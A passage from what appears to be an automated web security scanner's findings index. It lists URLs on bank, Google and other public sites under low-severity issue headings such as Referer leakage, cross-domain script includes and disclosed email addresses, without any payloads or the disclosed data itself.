15.23. http://www.invisionpower.com/products/

15.24. http://www.invisionpower.com/products/blog/

15.25. http://www.invisionpower.com/products/board/

15.26. http://www.invisionpower.com/products/board/features/

15.27. http://www.invisionpower.com/products/board/purchase.php

15.28. http://www.invisionpower.com/products/board/whats_new.php

15.29. http://www.invisionpower.com/products/chat/

15.30. http://www.invisionpower.com/products/content/

15.31. http://www.invisionpower.com/products/converge/

15.32. http://www.invisionpower.com/products/downloads/

15.33. http://www.invisionpower.com/products/gallery/

15.34. http://www.invisionpower.com/products/nexus/

15.35. http://www.invisionpower.com/products/nexus/features/store.php

15.36. http://www.invisionpower.com/products/spammonitor/

15.37. http://www.invisionpower.com/store/

15.38. http://www.invisionpower.com/store/index.php

15.39. http://www.invisionpower.com/suite/

15.40. http://www.invisionpower.com/suite/convert.php

15.41. http://www.invisionpower.com/suite/demo.php

15.42. http://www.invisionpower.com/suite/iphone

15.43. http://www.invisionpower.com/suite/license_benefits.php

15.44. http://www.invisionpower.com/suite/requirements.php

15.45. https://www.pnc.com/webapp/unsec/Blank.do

15.46. https://www.wachovia.com/helpcenter

16. Cross-domain Referer leakage

16.1. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=

16.2. http://citi.bridgetrack.com/a/s/

16.3. http://community.invisionpower.com/index.php

16.4. http://community.invisionpower.com/index.php

16.5. http://community.invisionpower.com/index.php

16.6. http://community.invisionpower.com/index.php

16.7. http://community.invisionpower.com/index.php

16.8. http://community.invisionpower.com/index.php

16.9. http://docs.google.com/viewer

16.10. http://fis.com/fis/worldnews/worldnews.asp

16.11. http://fls.doubleclick.net/activityi

16.12. http://fls.doubleclick.net/activityi

16.13. http://googleads.g.doubleclick.net/pagead/ads

16.14. http://googleads.g.doubleclick.net/pagead/ads

16.15. http://groups.google.com/groups

16.16. http://groups.google.com/groups

16.17. http://groups.google.com/grphp

16.18. http://homeloanhelp.bankofamerica.com/en/index.html

16.19. http://maps.google.com/maps

16.20. http://maps.google.com/maps

16.21. http://maps.google.com/maps

16.22. http://maps.google.com/maps/place

16.23. https://myaccounts.navyfcu.org/cgi-bin/ifsewwwc

16.24. http://news.google.com/news

16.25. http://news.google.com/news/advanced_news_search

16.26. http://news.google.com/news/directory

16.27. http://news.google.com/news/more

16.28. http://news.google.com/news/search

16.29. http://news.google.com/news/search

16.30. http://news.google.com/news/section

16.31. http://news.google.com/news/section

16.32. http://news.google.com/news/section

16.33. http://news.google.com/news/section

16.34. http://news.google.com/news/section

16.35. http://news.google.com/news/section

16.36. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html

16.37. https://onlineservices.wachovia.com/auth/AuthService

16.38. http://picasaweb.google.com/lh/view

16.39. https://picasaweb.google.com/lh/view

16.40. http://translate.google.com/

16.41. http://translate.google.com/translate_t

16.42. http://translate.google.com/translate_t

16.43. http://usa.visa.com/

16.44. http://video.google.com/

16.45. http://webcache.googleusercontent.com/search

16.46. http://www.abc.net.au/news/stories/2011/01/20/3117032.htm

16.47. http://www.arbornetworks.com/index.php

16.48. http://www.arbornetworks.com/index.php

16.49. https://www.arbornetworks.com/index.php

16.50. http://www.bankofamerica.com/index.cfm

16.51. http://www.bankofamerica.com/index.cfm

16.52. https://www.bankofamerica.com/credit-cards/cardoverview.action

16.53. https://www.bankofamerica.com/homepage/WidgetAction.go

16.54. https://www.bankofamerica.com/homepage/overview.go

16.55. http://www.capitalone.com/about/

16.56. http://www.capitalone.com/careers/

16.57. http://www.capitalone.com/financialeducation/

16.58. http://www.capitalone.com/smallbusiness/

16.59. http://www.capitalone.com/smallbusiness/business-money-market/

16.60. http://www.capitalone.com/smallbusiness/cards/

16.61. http://www.capitalone.com/smallbusiness/cards/index.php

16.62. http://www.capitalone.com/smallbusiness/payroll/

16.63. http://www.charterone.com/greensense/

16.64. http://www.charterone.com/moneyhelp/

16.65. http://www.charterone.com/savings-and-cds/goaltrack-savings.aspx

16.66. http://www.charterone.com/services/standard-overdraft-practices.aspx

16.67. http://www.charterone.com/tools/leaving.aspx

16.68. http://www.charterone.com/tools/regionalgateway.aspx

16.69. http://www.charterone.com/trufitstudentloan/

16.70. https://www.chase.com/auto-loan/car-loan.htm

16.71. https://www.chase.com/ccp/index.jsp

16.72. https://www.chase.com/index.jsp

16.73. http://www.chasemilitary.com/Default.aspx

16.74. http://www.citizensbank.com/checking/gold-banking-package.aspx

16.75. http://www.citizensbank.com/greensense/

16.76. http://www.citizensbank.com/moneyhelp/

16.77. http://www.citizensbank.com/mortgages/home-refinance.aspx

16.78. http://www.citizensbank.com/savings-and-cds/college-saver.aspx

16.79. http://www.citizensbank.com/savings-and-cds/goaltrack-savings.aspx

16.80. http://www.citizensbank.com/savings-and-cds/homebuyer-savings.aspx

16.81. http://www.citizensbank.com/services/standard-overdraft-practices.aspx

16.82. http://www.citizensbank.com/tools/leaving.aspx

16.83. http://www.citizensbank.com/tools/regionalgateway.aspx

16.84. http://www.citizensbank.com/trufitstudentloan/

16.85. http://www.emagazine.com/view/

16.86. http://www.facebook.com/plugins/like.php

16.87. http://www.firstnational.com/001/html/en/personal/online_serv/account_alerts.html

16.88. http://www.firstnational.com/001/html/en/personal/online_serv/online_banking.html

16.89. http://www.firstnational.com/001/html/en/personal/online_serv/online_billpay.html

16.90. http://www.firstnational.com/001/html/en/personal/online_serv/online_services.html

16.91. http://www.firstnational.com/001/html/en/personal/online_serv/paperless_statements.html

16.92. http://www.firstnational.com/001/html/en/personal/pers_products_serv/banking_accts/checking_accts/checking_accounts.html

16.93. http://www.firstnational.com/001/html/en/personal/pers_products_serv/first_at_work/firstatwork_program.html

16.94. http://www.firstnational.com/001/html/en/personal/pers_products_serv/loan_accts/mortgage_loans/mortgage_loans.html

16.95. http://www.fis.com/fis/worldnews/worldnews.asp

16.96. http://www.google.com/advanced_search

16.97. http://www.google.com/finance

16.98. http://www.google.com/finance

16.99. http://www.google.com/finance

16.100. http://www.google.com/finance

16.101. http://www.google.com/images

16.102. http://www.google.com/images

16.103. http://www.google.com/imghp

16.104. http://www.google.com/language_tools

16.105. http://www.google.com/prdhp

16.106. http://www.google.com/preferences

16.107. http://www.google.com/quality_form

16.108. http://www.google.com/realtime

16.109. http://www.google.com/search

16.110. http://www.google.com/search

16.111. http://www.google.com/search

16.112. http://www.google.com/search

16.113. http://www.google.com/search

16.114. http://www.google.com/search

16.115. http://www.google.com/search

16.116. http://www.google.com/search

16.117. http://www.google.com/search

16.118. http://www.google.com/support/news/bin/answer.py

16.119. http://www.google.com/support/news/bin/answer.py

16.120. http://www.google.com/support/news_pub/bin/static.py

16.121. http://www.google.com/support/websearch/bin/answer.py

16.122. http://www.google.com/url

16.123. http://www.google.com/url

16.124. http://www.google.com/webhp

16.125. http://www.google.com/webhp

16.126. http://www.invisionpower.com/store/index.php

16.127. http://www.jpmorganchase.com/corporate/Home/home.htm

16.128. http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx

16.129. http://www.learningsolutions.com.hk/index.php

16.130. http://www.macromedia.com/shockwave/download/index.cgi

16.131. http://www.merrilledge.com/m/pages/self-directed-investing.aspx

16.132. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx

16.133. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx

16.134. https://www.navyfederal.org/products-services/checking-savings/savings-rates.php

16.135. https://www.navyfederal.org/search.php

16.136. https://www.navyfederal.org/vendors/vendorMain.php

16.137. http://www.navyfederalresearch.org/se.ashx

16.138. http://www.perishablenews.com/index.php

16.139. https://www.pnc.com/webapp/sec/Forms.do

16.140. https://www.pnc.com/webapp/sec/ProductsAndService.do

16.141. https://www.pnc.com/webapp/unsec/Blank.do

16.142. https://www.pnc.com/webapp/unsec/Blank.do

16.143. https://www.pnc.com/webapp/unsec/Homepage.do

16.144. https://www.pnc.com/webapp/unsec/Homepage.do

16.145. https://www.pnc.com/webapp/unsec/NCProductsAndService.do

16.146. https://www.pnc.com/webapp/unsec/ProductsAndService.do

16.147. https://www.pnc.com/webapp/unsec/Solutions.do

16.148. http://www.thestandard.com.hk/news_detail.asp

16.149. http://www.thestandard.com.hk/news_detail.asp

16.150. https://www.wachovia.com/enroll

16.151. https://www.wachovia.com/foundation/v/index.jsp

16.152. https://www.wachovia.com/foundation/v/index.jsp

16.153. https://www.wellsfargo.com/jump/wachovia/EFS/WAC1

16.154. https://www.wellsfargo.com/jump/wachovia/insurance/identity

16.155. https://www.wellsfargo.com/jump/wachovia/mortgage/firsttimebuyer

16.156. https://www.wellsfargo.com/mortgage/rates

16.157. https://www.wellsfargo.com/mortgage/rates

16.158. https://www.wellsfargo.com/wachovia/insurance

16.159. http://www.youtube.com/

16.160. http://www.youtube.com/

17. Cross-domain script include

17.1. http://ahead.bankofamerica.com/

17.2. http://ahead.bankofamerica.com/quarterly-impact-report-3rd-quarter-2010/

17.3. http://asert.arbornetworks.com/

17.4. http://brandonaaron.net/

17.5. http://careers.jpmorganchase.com/career/careerhome

17.6. http://cnews.canoe.ca/CNEWS/Environment/Suzuki/2011/01/18/16940341.html

17.7. http://code.google.com/p/swfobject/

17.8. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/

17.9. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/

17.10. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/

17.11. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/

17.12. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/

17.13. http://creativecommons.org/licenses/by-nc-nd/3.0/

17.14. http://creativecommons.org/licenses/by/2.5/

17.15. http://docs.jquery.com/UI

17.16. http://docs.jquery.com/UI/Accordion

17.17. http://docs.jquery.com/UI/Mouse

17.18. http://docs.jquery.com/UI/Slider

17.19. http://docs.jquery.com/UI/Tabs

17.20. http://docs.jquery.com/UI/Widget

17.21. http://en.wikipedia.org/wiki/Invision_Power_Board

17.22. http://english.vietnamnet.vn/en/world-news/4381/launch-of-hong-kong-ocean-park--aqua-city-.html

17.23. http://fis.com/fis/worldnews/worldnews.asp

17.24. http://googlenewsblog.blogspot.com/

17.25. http://groups.google.com/grphp

17.26. http://ipboard-software.software.informer.com/

17.27. http://jquery.andreaseberhard.de/

17.28. http://jquery.com/

17.29. http://jquery.com/demo/thickbox/

17.30. http://jquery.org/license

17.31. http://jqueryui.com/about

17.32. http://learn.bankofamerica.com/

17.33. http://m.usa.visa.com/m/assistance/access.jsp

17.34. http://m.usa.visa.com/m/assistance/contact.jsp

17.35. http://m.usa.visa.com/m/assistance/index.jsp

17.36. http://m.usa.visa.com/m/assistance/lost.jsp

17.37. http://m.usa.visa.com/m/cards/buxx.jsp

17.38. http://m.usa.visa.com/m/cards/credit.jsp

17.39. http://m.usa.visa.com/m/cards/debit.jsp

17.40. http://m.usa.visa.com/m/cards/gift.jsp

17.41. http://m.usa.visa.com/m/cards/index.jsp

17.42. http://m.usa.visa.com/m/cards/prepaid.jsp

17.43. http://m.usa.visa.com/m/cards/readylink.jsp

17.44. http://m.usa.visa.com/m/cards/travelmoney.jsp

17.45. http://m.usa.visa.com/m/discounts/index.jsp

17.46. http://m.usa.visa.com/m/index.jsp

17.47. http://m.usa.visa.com/m/legal.jsp

17.48. http://mir.aculo.us/

17.49. https://myaccounts.navyfcu.org/cgi-bin/ifsewwwc

17.50. http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi

17.51. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html

17.52. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html

17.53. https://onlineservices.wachovia.com/auth/AuthService

17.54. http://picasaweb.google.com/lh/view

17.55. https://picasaweb.google.com/lh/view

17.56. http://script.aculo.us/

17.57. http://search.japantimes.co.jp/cgi-bin/fl20110109x1.html

17.58. http://search.wareseeker.com/ip-board/

17.59. http://sj.farmonline.com.au/news/state/viticulture/general/clean-seas-flags-smoother-sailing-ahead/2056939.aspx

17.60. http://survey.questus.com/survey/qst/qst10001

17.61. http://switchboard.nrdc.org/blogs/lsuatoni/the_evaluation_of_deepwater_ho.html

17.62. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more

17.63. http://twitter.com/PracticalMoney

17.64. http://twitter.com/navyfederalnews

17.65. https://usa.visa.com/signaturesouthwest/index.jsp

17.66. http://visa.via.infonow.net/usa_atm/

17.67. http://webcache.googleusercontent.com/search

17.68. http://www.arbornetworks.com/

17.69. http://www.arbornetworks.com/cleanpipes

17.70. http://www.arbornetworks.com/cn/865.html

17.71. http://www.arbornetworks.com/cn/infrastructure-security-report.html

17.72. http://www.arbornetworks.com/contact

17.73. http://www.arbornetworks.com/de/5.html

17.74. http://www.arbornetworks.com/de/infrastructure-security-report.html

17.75. http://www.arbornetworks.com/deeppacketinspection

17.76. http://www.arbornetworks.com/en/9.html

17.77. http://www.arbornetworks.com/en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html

17.78. http://www.arbornetworks.com/en/arbor-in-action-global-network-security-solution-resources.html

17.79. http://www.arbornetworks.com/en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html

17.80. http://www.arbornetworks.com/en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html

17.81. http://www.arbornetworks.com/en/asert-arbor-security-engineering-response-team-2.html

17.82. http://www.arbornetworks.com/en/atlas-global-network-threat-analysis-460.html

17.83. http://www.arbornetworks.com/en/channel-partners-3.html

17.84. http://www.arbornetworks.com/en/com-5fcontent/view-2.html

17.85. http://www.arbornetworks.com/en/com-5fcontent/view-3.html

17.86. http://www.arbornetworks.com/en/contact-us-4.html

17.87. http://www.arbornetworks.com/en/contact-us.html

17.88. http://www.arbornetworks.com/en/customer-solution-briefs.html

17.89. http://www.arbornetworks.com/en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html

17.90. http://www.arbornetworks.com/en/ipv6-report.html

17.91. http://www.arbornetworks.com/en/meet-our-partners.html

17.92. http://www.arbornetworks.com/en/network-monitoring-security-news-events.html

17.93. http://www.arbornetworks.com/en/network-security-experts-2.html

17.94. http://www.arbornetworks.com/en/network-security-monitoring-solutions-for-your-industry.html

17.95. http://www.arbornetworks.com/en/network-security-research-2.html

17.96. http://www.arbornetworks.com/en/network-security-visibility-products-235.html

17.97. http://www.arbornetworks.com/en/network-solutions-we-provide.html

17.98. http://www.arbornetworks.com/en/news-events.html

17.99. http://www.arbornetworks.com/en/partnership-inquiry-form.html

17.100. http://www.arbornetworks.com/en/services-network-support-maintenance-training-2.html

17.101. http://www.arbornetworks.com/en/solution-partners-4.html

17.102. http://www.arbornetworks.com/en/solutions-for-places-in-your-network.html

17.103. http://www.arbornetworks.com/en/solutions-for-your-business-needs.html

17.104. http://www.arbornetworks.com/en/technology-partners-4.html

17.105. http://www.arbornetworks.com/en/what-we-do-network-security-solutions-services.html

17.106. http://www.arbornetworks.com/en/white-papers-global-network-security-topics-2.html

17.107. http://www.arbornetworks.com/es/5.html

17.108. http://www.arbornetworks.com/es/infrastructure-security-report.html

17.109. http://www.arbornetworks.com/fr/4.html

17.110. http://www.arbornetworks.com/fr/infrastructure-security-report.html

17.111. http://www.arbornetworks.com/index.php

17.112. http://www.arbornetworks.com/it

17.113. http://www.arbornetworks.com/it/infrastructure-security-report.html

17.114. http://www.arbornetworks.com/jp/2.html

17.115. http://www.arbornetworks.com/jp/infrastructure-security-report.html

17.116. http://www.arbornetworks.com/kr/2.html

17.117. http://www.arbornetworks.com/kr/network-infrastructure-security-report.html

17.118. http://www.arbornetworks.com/privacy_policy.php

17.119. http://www.arbornetworks.com/report

17.120. https://www.arbornetworks.com/

17.121. https://www.arbornetworks.com/en/lost-password-3.html

17.122. https://www.arbornetworks.com/index.php

17.123. http://www.bankofamerica.com/index.cfm

17.124. http://www.boston.com/yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html

17.125. http://www.callforaction.org/

17.126. http://www.capitalone.com/smallbusiness/

17.127. http://www.capitalone.com/smallbusiness/business-money-market/

17.128. http://www.capitalone.com/smallbusiness/cards/

17.129. http://www.capitalone.com/smallbusiness/cards/index.php

17.130. http://www.capitalone.com/smallbusiness/payroll/

17.131. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html

17.132. http://www.charterone.com/branchlocator/

17.133. http://www.charterone.com/greensense/

17.134. http://www.citizensbank.com/branchlocator/

17.135. http://www.citizensbank.com/greensense/

17.136. http://www.cnn.com/2011/TECH/web/01/28/egypt.internet.shutdown/index.html

17.137. http://www.courthousenews.com/2011/01/14/33343.htm

17.138. http://www.digitalia.be/software/slimbox

17.139. http://www.directstartv.com/

17.140. http://www.emagazine.com/view/

17.141. http://www.enewspf.com/latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html

17.142. http://www.experian.com/

17.143. http://www.facebook.com/2008/fbml

17.144. http://www.facebook.com/plugins/like.php

17.145. http://www.facebook.com/plugins/like.php

17.146. http://www.filamentgroup.com/

17.147. http://www.firstnational.com/001/html/en/personal/personal.html

17.148. http://www.fis.com/fis/worldnews/worldnews.asp

17.149. http://www.forum-software.org/tag/ipboard

17.150. http://www.globalpost.com/dispatch/asia/110120/tunarama-festival-australia

17.151. http://www.google.com/intl/en/options/

17.152. http://www.google.com/services/

17.153. http://www.google.com/support/news/bin/answer.py

17.154. http://www.google.com/support/news_pub/bin/static.py

17.155. http://www.google.com/support/websearch/bin/answer.py

17.156. http://www.grist.org/article/food-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren

17.157. http://www.guardian.co.uk/business/2011/jan/11/offshore-oil-industry-white-house

17.158. http://www.heraldsun.com.au/ipad/blue-sky-thinking-at-farm/story-fn6bn4mv-1225993868919

17.159. http://www.invisionpower.com/company/contact.php

17.160. http://www.journalpioneer.com/News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1

17.161. http://www.jpmorganchase.com/corporate/Home/home.htm

17.162. http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx

17.163. http://www.julong.com.cn/en/News/188.html

17.164. http://www.kansascity.com/2011/01/10/2573323/earthtalk-are-atlantic-bluefin.html

17.165. http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html

17.166. http://www.merrilledge.com/m/pages/self-directed-investing.aspx

17.167. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx

17.168. https://www.merrilledge.com/m/pages/home.aspx

17.169. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx

17.170. http://www.monstersandcritics.com/news/asiapacific/news/article_1614700.php/Greens-slam-Hong-Kong-theme-park-for-importing-endangered-species

17.171. http://www.news.com.au/business/breaking-news/clean-seas-tuna-ltd-says-it-expects-to-post-a-net-loss/story-e6frfkur-1225993482916

17.172. http://www.nickstakenburg.com/

17.173. http://www.nickstakenburg.com/projects/lightview/

17.174. http://www.opensource.org/licenses/gpl-license.php

17.175. http://www.opensource.org/licenses/mit-license.php

17.176. http://www.opposingviews.com/i/bluefin-tuna-sells-for-400-000-in-tokyo-market

17.177. http://www.perishablenews.com/index.php

17.178. https://www.pnc.com/webapp/unsec/Homepage.do

17.179. https://www.pnc.com/webapp/unsec/NCProductsAndService.do

17.180. https://www.pnc.com/webapp/unsec/Solutions.do

17.181. https://www.pncvirtualwallet.com/

17.182. http://www.portlincolntimes.com.au/news/local/news/general/captive-tuna-spawn-again/2056995.aspx

17.183. http://www.projo.com/opinion/contributors/content/CT_nefish_01-11-11_ORLPT84_v8.4117508.html

17.184. http://www.retirement.merrilledge.com/IRA/pages/home.aspx

17.185. http://www.rthk.org.hk/rthk/news/englishnews/20110126/news_20110126_56_729958.htm

17.186. http://www.smh.com.au/environment/whale-watch/bps-plan-could-impact-on-whales-groups-20110118-19v04.html

17.187. http://www.theaustralian.com.au/business/clean-seas-tuna-scales-back-its-losses/story-e6frg8zx-1225993875502

17.188. http://www.thestandard.com.hk/news_detail.asp

17.189. http://www.thestandard.com.hk/news_detail.asp

17.190. http://www.upi.com/Science_News/2011/01/07/Blue-fin-tuna-sells-for-400000-in-Tokyo/UPI-23331294451264/

17.191. http://www.ustrust.com/ust/pages/index.aspx

17.192. http://www.wcti12.com/news/26551757/detail.html

17.193. http://www.webveteran.com/

17.194. http://www.youtube.com/

17.195. http://www.youtube.com/

18. File upload functionality

18.1. http://translate.google.com/

18.2. http://translate.google.com/translate_t

19. Email addresses disclosed

19.1. http://ads.adbrite.com/adserver/vdi/762701

19.2. http://ads.adbrite.com/adserver/vdi/762701

19.3. http://ads.adbrite.com/adserver/vdi/762701

19.4. http://ads.adbrite.com/adserver/vdi/762701

19.5. http://ads.adbrite.com/adserver/vdi/762701

19.6. https://arbor.custhelp.com/app/home

19.7. https://arbor.custhelp.com/app/ipreaddress

19.8. https://arbor.custhelp.com/app/utils/account_assistance

19.9. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=

19.10. https://arbor.custhelp.com/app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

19.11. http://blog.deconcept.com/2006/01/11/getvariable-setvariable-crash-internet-explorer-flash-6/

19.12. http://blog.deconcept.com/2006/07/28/swfobject-143-released/

19.13. http://careers.bankofamerica.com/overview/overview.asp

19.14. http://code.google.com/p/swfobject/

19.15. http://community.invisionpower.com/

19.16. http://community.invisionpower.com/forum/180-invision-power-services-inc/

19.17. http://community.invisionpower.com/forum/305-pre-sales-questions/

19.18. http://community.invisionpower.com/index.php

19.19. http://community.invisionpower.com/rss/blog/

19.20. http://community.invisionpower.com/topic/331403-custom-home-page/

19.21. http://community.invisionpower.com/user/102895-dawpi/

19.22. http://community.invisionpower.com/user/1092-breadfan/

19.23. http://community.invisionpower.com/user/125748-townie83/

19.24. http://community.invisionpower.com/user/13576-admiralty/

19.25. http://community.invisionpower.com/user/140069-heyhoe/

19.26. http://community.invisionpower.com/user/142765-fishfish0001/

19.27. http://community.invisionpower.com/user/150179-cloaked/

19.28. http://community.invisionpower.com/user/157503-therevtastic/

19.29. http://community.invisionpower.com/user/157929-paul-barnes/

19.30. http://community.invisionpower.com/user/179899-alessandror/

19.31. http://community.invisionpower.com/user/189809-4ipbcom/

19.32. http://community.invisionpower.com/user/46326-nidoking/

19.33. http://community.invisionpower.com/user/49-charles/

19.34. http://community.invisionpower.com/user/659-blush/

19.35. http://community.invisionpower.com/user/74840-dr-jekyll/

19.36. http://community.invisionpower.com/user/79427-zbahadir/

19.37. http://community.invisionpower.com/user/79705-sephi-kun/

19.38. http://english.vietnamnet.vn/en/world-news/4381/launch-of-hong-kong-ocean-park--aqua-city-.html

19.39. http://fis.com/fis/worldnews/worldnews.asp

19.40. http://groups.google.com/groups

19.41. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/

19.42. http://jqueryui.com/about

19.43. http://lovely-faces.com/lib/js/ModalPopups.js

19.44. http://m.usa.visa.com/m/legal.jsp

19.45. http://mir.aculo.us/

19.46. http://news.google.com/news

19.47. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html

19.48. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html

19.49. http://search.wachovia.com/selfservice/jslib/CalendarPopup.js

19.50. http://usa.visa.com/about_visa/ask_visa/index.html

19.51. http://usa.visa.com/js/visa.js

19.52. http://usa.visa.com/merchants/index.html

19.53. http://usa.visa.com/personal/security/get-help-now.html

19.54. http://usa.visa.com/personal/security/identity_theft_search.jsp

19.55. http://usa.visa.com/personal/using_visa/visa_travelers_cheques.html

19.56. http://usa.visa.com/sitewide/legal.html

19.57. http://usa.visa.com/sitewide/privacy_policy.html

19.58. https://usa.visa.com/signaturesouthwest/index.jsp

19.59. http://www.arbornetworks.com/en/network-monitoring-security-news-events.html

19.60. http://www.arbornetworks.com/en/news-events.html

19.61. http://www.arbornetworks.com/en/services-network-support-maintenance-training-2.html

19.62. http://www.arbornetworks.com/jp/infrastructure-security-report.html

19.63. http://www.asual.com/swfaddress/

19.64. http://www.boston.com/yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html

19.65. http://www.capitalone.com/autoloans/auto-loan-calculator.php

19.66. http://www.capitalone.com/autoloans/refinance/

19.67. http://www.capitalone.com/contactus/

19.68. http://www.capitalone.com/fraud/prevention/index.php

19.69. http://www.capitalone.com/protection/security/index.php

19.70. https://www.capitalone.com/css/footer.css

19.71. https://www.capitalone.com/css/framework/base.css

19.72. https://www.capitalone.com/css/framework/grid.css

19.73. https://www.capitalone.com/css/framework/print.css

19.74. https://www.capitalone.com/css/header.css

19.75. https://www.capitalone.com/css/page-nav-heading.css

19.76. https://www.capitalone.com/css/page-type/homepage.css

19.77. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html

19.78. http://www.change.org/javascripts/application.js

19.79. http://www.charterone.com/scripts/overlaybox/browserdetectlite.js

19.80. http://www.charterone.com/security/

19.81. https://www.chase.com/index.jsp

19.82. http://www.chasemilitary.com/js/DD_belatedPNG_0.0.8a-min.js

19.83. http://www.china-iwb.com/abcde/Editor/UploadFile/2009522165941674.pdf

19.84. http://www.citizensbank.com/online-banking/faq.aspx

19.85. http://www.citizensbank.com/scripts/overlaybox/browserdetectlite.js

19.86. http://www.citizensbank.com/security/

19.87. http://www.directstartv.com/

19.88. http://www.emagazine.com/view/

19.89. http://www.fdic.gov/

19.90. http://www.filamentgroup.com/

19.91. http://www.firstnational.com/001/html/en/personal/pers_products_serv/invest_advisory/invest_advisory.html

19.92. http://www.firstnational.com/001/html/en/personal/pers_products_serv/loan_accts/mortgage_loans/mortgage_loans.html

19.93. http://www.firstnational.com/config/html/en/js/dragdrop.js

19.94. http://www.fis.com/fis/worldnews/worldnews.asp

19.95. http://www.forum-software.org/tag/ipboard

19.96. http://www.gnu.org/copyleft/gpl.html

19.97. http://www.gnu.org/licenses/gpl.html

19.98. http://www.gnu.org/licenses/licenses.html

19.99. https://www.google.com/accounts/Login

19.100. https://www.google.com/accounts/ServiceLogin

19.101. http://www.guardian.co.uk/business/2011/jan/11/offshore-oil-industry-white-house

19.102. http://www.heraldsun.com.au/ipad/blue-sky-thinking-at-farm/story-fn6bn4mv-1225993868919

19.103. http://www.invisionpower.com/company/contact.php

19.104. http://www.invisionpower.com/legal/privacy.php

19.105. http://www.invisionpower.com/suite/demo.php

19.106. http://www.journalpioneer.com/News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1

19.107. http://www.jpmorgan.com/script/jquery.pngFix.pack.js

19.108. http://www.jpmorgan.com/script/lightbox_support/controls.js

19.109. http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx

19.110. http://www.lokeshdhakar.com/

19.111. http://www.macaudailytimes.com.mo/compress.php

19.112. https://www.navyfederal.org/account-management/how-do-i.php

19.113. https://www.navyfederal.org/js/facebox.js

19.114. https://www.navyfederal.org/js/jquery.pngFix.js

19.115. http://www.news.com.au/business/breaking-news/clean-seas-tuna-ltd-says-it-expects-to-post-a-net-loss/story-e6frfkur-1225993482916

19.116. http://www.nickstakenburg.com/

19.117. http://www.nickstakenburg.com/projects/lightview/

19.118. http://www.opensource.org/licenses/gpl-license.php

19.119. http://www.opensource.org/licenses/mit-license.php

19.120. http://www.perishablenews.com/index.php

19.121. http://www.perishablenews.com/index.php

19.122. https://www.pnc.com/webapp/sec/Forms.do

19.123. https://www.pnc.com/webapp/unsec/Blank.do

19.124. https://www.pnc.com/webapp/unsec/depositRates/init.app

19.125. https://www.pnc.com/webapp/unsec/homeEquity/init.app

19.126. http://www.positioniseverything.net/easyclearing.html

19.127. http://www.retirement.merrilledge.com/publish/js/2010.12.14/global_min.js

19.128. http://www.sipc.org/

19.129. http://www.thestandard.com.hk/news_detail.asp

19.130. http://www.w3.org/TR/html4/loose.dtd

19.131. http://www.w3.org/TR/html4/strict.dtd

19.132. https://www.wachovia.com/common_files/metrics/vignette/stats.js

19.133. https://www.wachovia.com/files/Hands_on_Banking.pdf

19.134. http://www.wcti12.com/news/26551757/detail.html

19.135. https://www.wellsfargo.com/equity/

19.136. https://www.wellsfargo.com/help/

19.137. https://www.wellsfargo.com/privacy_security/

19.138. https://www.wellsfargo.com/privacy_security/fraud/

19.139. https://www.wellsfargo.com/privacy_security/fraud/report/

19.140. https://www.wellsfargo.com/privacy_security/fraud/report/fraud

20. Private IP addresses disclosed

20.1. http://search.japantimes.co.jp/cgi-bin/fl20110109x1.html

20.2. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more

20.3. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more

20.4. http://www.firstnational.com/config/html/en/searchresults.asp

20.5. http://www.firstnational.com/config/html/en/searchresults.asp

20.6. http://www.google.com/sdch/GeNLY2f-.dct

20.7. http://www.viglink.com/

21. Social security numbers disclosed

21.1. http://m.usa.visa.com/m/assistance/lost.jsp

21.2. http://usa.visa.com/personal/security/get-help-now.html

21.3. http://usa.visa.com/personal/using_visa/visa_travelers_cheques.html

22. Credit card numbers disclosed

22.1. http://www.arbornetworks.com/dmdocuments/ISR2008_US.pdf

22.2. http://www.arbornetworks.com/dmdocuments/WISP_US_12sept07.pdf

22.3. http://www.arbornetworks.com/dmdocuments/WorldwideInfrastructureSecurityReport_US_sept06.pdf

23. Cacheable HTTPS response

